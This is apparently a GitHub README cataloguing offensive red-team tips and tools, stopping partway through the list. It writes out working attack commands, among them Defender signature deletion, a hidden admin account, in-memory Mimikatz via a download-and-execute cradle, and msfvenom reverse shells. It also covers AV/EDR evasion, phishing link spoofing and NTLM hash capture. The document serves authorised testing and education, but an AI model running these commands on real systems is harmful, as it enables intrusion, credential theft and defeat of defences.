Tools and Techniques for Red Team / Penetration Testing
RedTeam-Tools
This github repository contains a collection of 150+ tools and resources that can be useful for red teaming activities.
Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
π If you are a Blue Teamer, check out BlueTeam-Tools
Warning>
The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.
Note>
Hide Tool List headings with the arrow.>
Click π to get back to the list.
Tool List
Red Team Tips 19 tips
Reconnaissance 24 tools
Resource Development 12 tools
Initial Access 10 tools
Execution 13 tools
Persistence 4 tools
Privilege Escalation 11 tools
Defense Evasion 8 tools
Credential Access 11 tools
Discovery 6 tools
Lateral Movement 12 tools
Collection 3 tools
Command and Control 9 tools
Impact 4 tools
Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.
πImproved HTML smuggling with mouse move eventlistener
Description: 'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'
Credit: @pr0xylife
Link: Twitter
πGoogle translate for phishing
Description: Successful phishing page credential stealing being proxied via the google translate page view functionality.
Credit: @malmoeb
Link: Twitter
πHiding the local admin account
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'
Credit: @Alh4zr3d
Link: Twitter
πCripple windows defender by deleting signatures
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'
Credit: @Alh4zr3d
Link: Twitter
πEnable multiple RDP sessions per user
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'
Credit: @Alh4zr3d
Link: Twitter
πSysinternals PsExec.exe local alternative
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
πLive off the land port scanner
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgtip>,$)) "Port $_ open"} 2>$null
Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'
Credit: @Alh4zr3d
Link: Twitter
πProxy aware PowerShell DownloadString
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'
Credit: @Alh4zr3d
Link: Twitter
πLooking for internal endpoints in browser bookmarks
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'
Credit: @Alh4zr3d
Link: Twitter
πQuery DNS records for enumeration
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'
Credit: @Alh4zr3d
Link: Twitter
πUnquoted service paths without PowerUp
Get-CIMInstance -class Win32Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows" -and $.PathName -notlike '"'} | select PathName,DisplayName,Name
Description: 'Finding unquoted service paths without PowerUp'
Credit: @Alh4zr3d
Link: Twitter
πBypass a disabled command prompt with /k
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
Description: 'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.
Credit: Martin Sohn Christensen
Link: Blog
πStop windows defender deleting mimikatz.exe
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
πCheck if you are in a virtual machine
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'
Credit: @dmcxblue
Link: Twitter
πEnumerate AppLocker rules
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEYLOCALMACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
Description: 'AppLocker can be a pain. Enumerate to see how painful'
Credit: @Alh4zr3d
Link: Twitter
πCMD shortcut with 6 pixels via mspaint

- Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
- Zoom in to make the following tasks easier
- Using the colour picker, set pixels values to (from left to right):
- Save it as 24-bit Bitmap (.bmp;.dib)
- Change its extension from bmp to bat and run.
Credit: PenTestPartners
Link: Blog
πLink spoofing with PreventDefault JavaScript method

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PreventDefault Example</title>
</head>
<body>
<a href="https://google.com" >Go to Google</a>
</body>
</html>
Description: Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link google.com, but once clicked the victim will be redirected to your malicious link bing.com. Great for getting victims to download payloads via a controlled site.
Link: PreventDefault Docs
πCheck SMB firewall rules with Responder

Copy-Item -Path "C:\tmp\" -Destination "\\<iprunningresponder>\c$"
Description: 'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<iprunningresponder>\c$". If Responder could capture the hash, the firewall allows outgoing SMB connections'
Credit: @malmoeb
Link: Twitter
πDisable AV with SysInternals PsSuspend
Description: Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.
Related Blog Post: Bypassing AV via Process Suspension with PsSuspend.exe
Link: Twitter
Reconnaissance ====================
πspiderfoot
SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.
SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.
Install:
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt
For full installation instructions see here.
Usage:
python3 ./sf.py -l 127.0.0.1:5001
Lots of usage tutorial videos here
Image used from https://github.com/smicallef/spiderfoot
πreconftw
reconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
Install:
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh
For full installation instructions see here.
Usage:
# Single target domain
./reconftw.sh -d target.com -r
One target with multiple domains
./reconftw.sh -m target -l domains.txt -r
Passive recon
./reconftw.sh -d target.com -p
Perform all checks and exploitations
./reconftw.sh -d target.com -a
For full usage instructions see here.
Image used from https://www.youtube.com/watch?v=TQmDAtkD1Wo
πsubzy
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz.
Install:
go install -v github.com/PentestPad/subzy@latest
For full installation instructions see here.
Usage:
# List of subdomains
./subzy run --targets list.txt
Single or multiple targets
./subzy run --target test.google.com
./subzy run --target test.google.com,https://test.yahoo.com
Image used from https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/
πsmtp-user-enum
SMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.
Install:
pip install smtp-user-enum
Usage:
smtp-user-enum [options] -u/-U host port
smtp-user-enum --help
smtp-user-enum --version
Image used from https://www.kali.org/tools/smtp-user-enum/
πcrt.sh -> httprobe -> EyeWitness
I have put together a bash one-liner that:
- Passively collects a list of subdomains from certificate associations (crt.sh)
- Actively requests each subdomain to verify it's existence (httprobe)
- Actively screenshots each subdomain for manual review (EyeWitness)
domain=DOMAINCOM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enumtmp${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enumtmp_${rand}.txt --web
Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAINCOM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains


πjsendpoints
A JavaScript bookmarklet for extracting all webpage endpoint links on a page.
Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.
(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Usage (Bookmarklet)
Create a bookmarklet...
Right click your bookmark barClick 'Add Page'Paste the above Javascript in the 'url' boxClick 'Save'

Usage (Console)
Paste the above Javascript into the console window F12 and press enter.

πnuclei
Fast vulnerability scanner that uses .yaml templates to search for specific issues.
Install:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Usage:
cat domains.txt | nuclei -t /PATH/nuclei-templates/

πcertSniff
certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.
You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.
Install:
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
Usage:
python3 certSniff.py -f example.txt

πgobuster
Nice tool for brute forcing file/folder paths on a victim website.
Install:
sudo apt install gobuster
Usage:
gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

πferoxbuster
A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.
Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...
Install: (Kali)
sudo apt update && sudo apt install -y feroxbuster
Install: (Mac)
curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
Install: (Windows)
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
For full installation instructions see here.
Usage:
# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
Full usage examples can be found here.

Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif
πCloudBrute
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
Features:
- Cloud detection (IPINFO API and Source Code)
- Fast (concurrent)
- Cross Platform (windows, linux, mac)
- User-Agent Randomization
- Proxy Randomization (HTTP, Socks5)
Download the latest release for your system and follow the usage.
Usage:
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Image used from https://github.com/0xsha/CloudBrute
πdnsrecon
dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.
Install:
sudo apt install dnsrecon
Usage:
dnsrecon -d google.com

πshodan.io
Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.

πAORT
Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.
Install:
git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
Usage:
python3 AORT.py -d google.com

πspoofcheck
A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.
Domains are spoofable if any of the following conditions are met:
- Lack of an SPF or DMARC record
- SPF record never specifies
~allor-all - DMARC policy is set to
p=noneor is nonexistent
git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
Usage:
./spoofcheck.py [DOMAIN]

πAWSBucketDump
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.
Install:
git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
Usage:
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
πGitHarvester
Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.
Install:
git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
Usage:
./githarvester.py
πtruffleHog
TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.
Install (Binaries): Link
Install (Go):
git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
Usage:
trufflehog https://github.com/trufflesecurity/test_keys

πDismap
Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.
Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.
Install:
Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:
# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h
Windows
dismap-0.3-windows-amd64.exe -h
Usage:
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

Image used from https://github.com/zhzyker/dismap
πenum4linux
A tool for enumerating information from Windows and Samba systems.
It can be used to gather a wide range of information, including:
- Domain and domain controller information
- Local user and group information
- Shares and share permissions
- Security policies
- Active Directory information
sudo apt install enum4linux
Install: (Git)
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
Usage:
# 'Do everything'
enum4linux.pl -a 192.168.2.55
Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55
Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55
Get a list of groups and their members
enum4linux.pl -G 192.168.2.55
Verbose scan
enum4linux.pl -v 192.168.2.55
Full usage information can be found in this blog.

Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/
πskanuvaty
Dangerously fast dns/network/port scanner, created by Esc4iCEscEsc, written in rust.
You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.
Install:
Download the latest release from here.
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
Usage:
skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

Image used from https://github.com/Esc4iCEscEsc/skanuvaty
πMetabigor
Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.
Main Features:
- Searching information about IP Address, ASN and Organization.
- Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.
- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
- Get Summary about IP address (powered by @thebl4ckturtle)
go install github.com/j3ssie/metabigor@latest
Usage:
# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt
Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt
Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'
Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'

Image used from https://github.com/j3ssie/metabigor
πGitrob
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.
Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
The findings will be presented through a web interface for easy browsing and analysis.
Note: Gitrob will need a Github access token in order to interact with the Github API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:
export GITROBACCESSTOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
Install: (Go)
go get github.com/michenriksen/gitrob
Install: (Binary)
A precompiled version is available for each release.
Usage:
# Run against org
gitrob {org_name}
Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
Loading session from a file
gitrob -load ~/gitrob-session.json

Image used from https://www.uedbox.com/post/58828/
πgowitness
Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.
Install: (Go)
go install github.com/sensepost/gowitness@latest
Full installation information can be found here.
Usage:
# Screenshot a single website
gowitness single https://www.google.com/
Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
Run the report server
gowitness report serve
Full usage information can be found here.

Image used from https://github.com/sensepost/gowitness
Resource Development ====================
πremoteInjector
Injects link to remote word template into word document.
This Python-based utility modifies a .docx fileβs settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.
Install:
git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector
Usage:
python3 remoteinjector.py -w https://example.com/template.dotm example.docx
πChimera
Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
Install:
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
Usage:
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

πmsfvenom
Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.
Set Up Listener
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
Msfvenom Commands
PHP:
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Windows:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
Linux:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:
msfvenom -p java/jspshellreverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
HTA:
msfvenom -p windows/shellreversetcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

πShellter
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
Shellter takes advantage of the original structure of the PE file and doesnβt apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.
Full README information can be found here.
Install: (Kali)
apt-get update
apt-get install shellter
Install: (Windows)
Visit the download page and install.
Usage:
Just pick a legit binary to backdoor and run Shellter.
Some nice tips can be found here.
Lots of community usage demos can be found here.

Image used from https://www.kali.org/tools/shellter/images/shellter.png
πFreeze
Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.
Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.
Install:
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
Usage:
-I string
Path to the raw 64-bit shellcode.
-O string
Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-encrypt
Encrypts the shellcode using AES 256 encryption
-export string
For DLL Loaders Only - Specify a specific Export function for a loader to have.
-process string
The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
-sandbox
Enables sandbox evasion by checking:
Is Endpoint joined to a domain?
Does the Endpoint have more than 2 CPUs?
Does the Endpoint have more than 4 gigs of RAM?
-sha256
Provides the SHA256 value of the loaders (This is useful for tracking)

Image used from https://www.blackhatethicalhacking.com/tools/freeze/
πWordSteal
This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.
Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.
Install:
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
Usage:
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1
Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0\n

Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/
πNTAPI Undocumented Functions
This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.
It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis,
README truncated. View on GitHub